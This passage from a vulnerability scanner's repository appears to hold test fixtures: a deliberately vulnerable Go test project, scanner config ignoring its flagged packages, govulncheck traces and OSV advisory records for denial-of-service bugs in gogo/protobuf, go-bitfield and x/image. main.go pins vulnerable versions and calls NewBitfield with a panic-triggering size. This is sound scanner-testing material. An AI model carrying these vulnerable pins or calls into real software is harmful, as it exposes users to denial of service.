v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/image v0.4.0 h1:x1RWAiZIvERqkltrFjtQP1ycmiR5pmhjtCfVOtdURuQ= golang.org/x/image v0.4.0/go.mod h1:FVC7BI/5Ym8R25iw5OLsgshdUBbT1h5jZTpA+mvAdZ4= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= 
golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= ================================================ FILE: internal/sourceanalysis/testdata/go-integration/test-project/main.go ================================================ package main import ( "log" "net/http" "github.com/gogo/protobuf/plugin/unmarshal" "github.com/gogo/protobuf/version" "github.com/ipfs/go-bitfield" ) func main() { print(version.AtLeast("v1.2.3")) unmarshal.NewUnmarshal() bitfield.NewBitfield(14) // Test stdlib err := http.ListenAndServe(":8080", nil) if err != nil { log.Fatal(err) } } ================================================ FILE: internal/sourceanalysis/testdata/go-integration/test-project/osv-scanner.toml ================================================ [[PackageOverrides]] name = "github.com/ipfs/go-bitfield" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "github.com/gogo/protobuf" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "golang.org/x/image" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "stdlib" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" ================================================ FILE: internal/sourceanalysis/testdata/json/govulncheckinput.json 
================================================ { "GHSA-c3h9-896r-86jm": [ { "osv": "GHSA-c3h9-896r-86jm", "trace": [ { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/proto", "function": "RegisterEnum", "position": { "filename": "/go/pkg/mod/github.com/gogo/protobuf@v1.3.1/proto/properties.go", "offset": 14200, "line": 518, "column": 6 } }, { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/protoc-gen-gogo/descriptor", "function": "init#1", "position": { "filename": "/go/pkg/mod/github.com/gogo/protobuf@v1.3.1/protoc-gen-gogo/descriptor/descriptor.pb.go", "offset": 98891, "line": 2668, "column": 20 } }, { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/protoc-gen-gogo/descriptor", "function": "init", "position": { "filename": "/go/pkg/mod/github.com/gogo/protobuf@v1.3.1/protoc-gen-gogo/descriptor/descriptor.go", "offset": 1932, "line": 37, "column": 1 } }, { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/plugin/unmarshal", "function": "init", "position": { "filename": "/go/pkg/mod/github.com/gogo/protobuf@v1.3.1/plugin/unmarshal/unmarshal.go", "offset": 5007, "line": 184, "column": 2 } }, { "module": "github.com/ossf-tests/osv-e2e", "package": "github.com/ossf-tests/osv-e2e", "function": "init", "position": { "filename": "/Documents/Project/osv-scanner/internal/sourceanalysis/testdata/go-integration/test-project/main.go", "offset": 44, "line": 7, "column": 2 } } ] } ], "GO-2021-0053": [ { "osv": "GO-2021-0053", "fixed_version": "v1.3.2", "trace": [ { "module": "github.com/gogo/protobuf", "version": "v1.3.1" } ] }, { "osv": "GO-2021-0053", "fixed_version": "v1.3.2", "trace": [ { "module": "github.com/gogo/protobuf", "version": "v1.3.1", "package": "github.com/gogo/protobuf/plugin/unmarshal" } ] } ], "GO-2023-1558": [ { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", 
"trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0" } ] }, { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0", "package": "github.com/ipfs/go-bitfield" } ] }, { "osv": "GO-2023-1558", "fixed_version": "v1.1.0", "trace": [ { "module": "github.com/ipfs/go-bitfield", "version": "v1.0.0", "package": "github.com/ipfs/go-bitfield", "function": "NewBitfield", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 12, "column": 6 } }, { "module": "github.com/ossf-tests/osv-e2e", "package": "github.com/ossf-tests/osv-e2e", "function": "main", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 16, "column": 22 } } ] } ], "GO-2023-2382": [ { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0", "package": "net/http/internal" } ] }, { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0", "package": "net/http/internal" } ] }, { "osv": "GO-2023-2382", "fixed_version": "v1.20.12", "trace": [ { "module": "stdlib", "version": "v1.19.0", "package": "net/http/internal", "function": "Read", "receiver": "*chunkedReader", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 97, "column": 26 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "readLocked", "receiver": "*body", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 839, "column": 21 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Read", "receiver": "bodyLocked", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 1038, "column": 24 } }, { "module": "stdlib", "version": "v1.19.0", "package": "io", "function": "copyBuffer", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 430, "column": 21 } }, { "module": "stdlib", "version": 
"v1.19.0", "package": "io", "function": "Copy", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 389, "column": 19 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Close", "receiver": "*body", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 1002, "column": 19 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "finishRequest", "receiver": "*response", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 1670, "column": 17 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "serve", "receiver": "*conn", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 2015, "column": 18 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "Serve", "receiver": "*Server", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 3086, "column": 3 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "ListenAndServe", "receiver": "*Server", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 2985, "column": 18 } }, { "module": "stdlib", "version": "v1.19.0", "package": "net/http", "function": "ListenAndServe", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 3239, "column": 30 } }, { "module": "github.com/ossf-tests/osv-e2e", "package": "github.com/ossf-tests/osv-e2e", "function": "main", "position": { "filename": "\u003cAny value\u003e", "offset": -1, "line": 19, "column": 28 } } ] } ] } ================================================ FILE: internal/sourceanalysis/testdata/json/input-no-call-data.json ================================================ [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": 
"2022-03-28T20:28:00Z", "aliases": [ "CVE-2021-3121" ], "summary": "Improper Input Validation in GoGo Protobuf", "details": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", 
"severity": "HIGH" } }, { "schema_version": "1.3.0", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "aliases": [ "CVE-2021-3121", "GHSA-c3h9-896r-86jm" ], "summary": "", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ] } ], "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ] } ] }, { "package": { "name": "github.com/ipfs/go-bitfield", "version": "1.0.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "aliases": [ "CVE-2023-23626" ], "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments", "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- 
https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ] } ], "versions": [ "1.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" } }, { "schema_version": "1.3.0", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "summary": "", "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "affected": [ { "package": { "ecosystem": "Go", "name": 
"github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } } ], "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ] } ], "groups": [ { "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ] } ] }, { "package": { "name": "golang.org/x/image", "version": "0.4.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "aliases": [ "CVE-2022-41727" ], "summary": "Uncontrolled Resource Consumption", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. 
This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.3.0", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "aliases": [ "CVE-2022-41727" ], "summary": "", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. 
This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ] } ], "groups": [ { "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ] } ] } ] ================================================ FILE: internal/sourceanalysis/testdata/json/input.json ================================================ [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-c3h9-896r-86jm", "modified": "2022-03-28T20:28:00Z", "published": "2022-03-28T20:28:00Z", "aliases": [ "CVE-2021-3121" ], "summary": "Improper Input Validation in GoGo Protobuf", "details": "An issue was discovered in GoGo Protobuf before 1.3.2. 
plugin/unmarshal/unmarshal.go lacks certain index validation, aka the \"skippy peanut butter\" issue.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-c3h9-896r-86jm/GHSA-c3h9-896r-86jm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" }, { "type": "WEB", "url": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025" }, { "type": "PACKAGE", "url": "https://github.com/gogo/protobuf" }, { "type": "WEB", "url": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210219-0006/" } ], "database_specific": { "cwe_ids": [ "CWE-129", "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-03-28T20:28:00Z", "nvd_published_at": "2021-01-11T06:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.3.0", "id": "GO-2021-0053", "modified": "2023-02-10T16:51:38Z", "published": "2021-04-14T20:04:52Z", "aliases": [ "CVE-2021-3121", 
"GHSA-c3h9-896r-86jm" ], "summary": "", "details": "Due to improper bounds checking, maliciously crafted input to generated Unmarshal methods can cause an out-of-bounds panic. If parsing messages from untrusted parties, this may be used as a denial of service vector.", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "purl": "pkg:golang/github.com/gogo/protobuf" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.3.2" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2021-0053.json", "url": "https://pkg.go.dev/vuln/GO-2021-0053" }, "ecosystem_specific": { "imports": [ { "path": "github.com/gogo/protobuf/plugin/unmarshal", "symbols": [ "unmarshal.Generate", "unmarshal.field" ] } ] } } ], "references": [ { "type": "FIX", "url": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc" } ] } ], "groups": [ { "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ] } ] }, { "package": { "name": "github.com/ipfs/go-bitfield", "version": "1.0.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-02-10T19:52:45Z", "published": "2023-02-10T19:52:45Z", "aliases": [ "CVE-2023-23626" ], "summary": "IPFS go-bitfield vulnerable to DoS via malformed size arguments", "details": "### Impact\nWhen feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s.\n\nThis happen when the `size` is a not a multiple of `8` or is negative.\nThere were already a note in the `NewBitfield` documentation:\n\u003e ```\n\u003e Panics if size is not a multiple of 8.\n\u003e ````\n\nBut it incomplete and missing from `FromBytes`'s documentation.\n\nThis has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong.\n\n### Patches\n- 
https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579\n\n### Workarounds\n- Ensure `size%8 == 0 \u0026\u0026 size \u003e= 0` yourself before calling `NewBitfield` or `FromBytes`\n\n### References\n- https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778\n", "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.0.0" }, { "fixed": "1.1.0" } ] } ], "versions": [ "1.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-2h6c-j3gf-xp9r/GHSA-2h6c-j3gf-xp9r.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23626" }, { "type": "WEB", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" }, { "type": "PACKAGE", "url": "https://github.com/ipfs/go-bitfield" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1558" } ], "database_specific": { "cwe_ids": [ "CWE-1284", "CWE-754" ], "github_reviewed": true, "github_reviewed_at": "2023-02-10T19:52:45Z", "nvd_published_at": "2023-02-09T21:15:00Z", "severity": "MODERATE" } }, { "schema_version": "1.3.0", "id": "GO-2023-1558", "modified": "2023-02-14T19:41:21Z", "published": "2023-02-14T19:41:21Z", "aliases": [ "CVE-2023-23626", "GHSA-2h6c-j3gf-xp9r" ], "summary": "", "details": "When feeding untrusted user input into the size parameter of `NewBitfield` and FromBytes functions, an attacker can trigger panics.\n\nThis happens when the size is a not a multiple of 8 or is negative.\n\nA workaround is to ensure size%8 == 0 \u0026\u0026 size \u003e= 0 yourself before calling NewBitfield or FromBytes.", "affected": [ { "package": { "ecosystem": "Go", "name": 
"github.com/ipfs/go-bitfield", "purl": "pkg:golang/github.com/ipfs/go-bitfield" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.1.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1558.json", "url": "https://pkg.go.dev/vuln/GO-2023-1558" }, "ecosystem_specific": { "imports": [ { "path": "github.com/ipfs/go-bitfield", "symbols": [ "FromBytes", "NewBitfield" ] } ] } } ], "references": [ { "type": "ADVISORY", "url": "https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r" }, { "type": "FIX", "url": "https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579" } ] } ], "groups": [ { "ids": [ "GHSA-2h6c-j3gf-xp9r", "GO-2023-1558" ] } ] }, { "package": { "name": "golang.org/x/image", "version": "0.4.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.3.0", "id": "GHSA-qgc7-mgm3-q253", "modified": "2023-02-17T13:59:44Z", "published": "2023-02-17T13:59:44Z", "aliases": [ "CVE-2022-41727" ], "summary": "Uncontrolled Resource Consumption", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. 
This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-qgc7-mgm3-q253/GHSA-qgc7-mgm3-q253.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41727" }, { "type": "WEB", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://go.dev/issue/58003" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1572" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T13:59:44Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.3.0", "id": "GO-2023-1572", "modified": "2023-02-16T22:25:24Z", "published": "2023-02-16T22:25:24Z", "aliases": [ "CVE-2022-41727" ], "summary": "", "details": "An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. 
This could lead to a denial of service.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/image", "purl": "pkg:golang/golang.org/x/image" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.5.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1572.json", "url": "https://pkg.go.dev/vuln/GO-2023-1572" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/image/tiff", "symbols": [ "Decode", "DecodeConfig", "decoder.ifdUint", "newDecoder" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/58003" }, { "type": "FIX", "url": "https://go.dev/cl/468195" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/ag-FiyjlD5o" } ] } ], "groups": [ { "ids": [ "GHSA-qgc7-mgm3-q253", "GO-2023-1572" ] } ] } ] ================================================ FILE: internal/sourceanalysis/testdata/json/output-no-call-data.json ================================================ [ { "groups": [ { "experimentalAnalysis": {}, "ids": [ "GHSA-c3h9-896r-86jm", "GO-2021-0053" ] } ], "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf", "version": "1.3.1" }, "vulnerabilities": [ { "affected": [ { "database_specific": { "source": 